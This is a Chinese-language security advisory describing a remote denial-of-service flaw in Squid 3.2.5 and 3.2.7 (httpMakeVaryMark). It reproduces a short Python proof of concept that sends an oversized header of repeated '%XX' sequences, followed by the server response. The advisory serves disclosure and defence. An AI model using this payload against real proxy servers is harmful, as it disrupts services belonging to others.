受影响系统:
Squid Squid 3.2.7
Squid Squid 3.2.5
描述:
BUGTRAQ ID: 58319
Squid是一个高效的Web缓存及代理程序。
Squid 3.2.5、3.2.7在函数’httpMakeVaryMark()’的实现上存在安全漏洞,成功利用后可允许远程攻击者造成Squid内存异常,触发拒绝服务。
<*来源:tytusromekiatomek (tytusromekiatomek@hushmail.com) 链接:http://seclists.org/fulldisclosure/2013/Mar/62 *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
tytusromekiatomek (tytusromekiatomek@hushmail.com)提供了如下测试方法:
Request
— cut —
#!/usr/bin/env python
print ‘GET /index.html HTTP/1.1’
print ‘Host: localhost’
print ‘X-HEADSHOT: ‘ + ‘%XX’ * 19000
print ‘\r\n\r\n’
— cut —
Response
— cut —
HTTP/1.1 200 OK
Vary: X-HEADSHOT
— cut —
建议:
厂商补丁:
Squid
—–
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.squid-cache.org/Advisories/
评论关闭。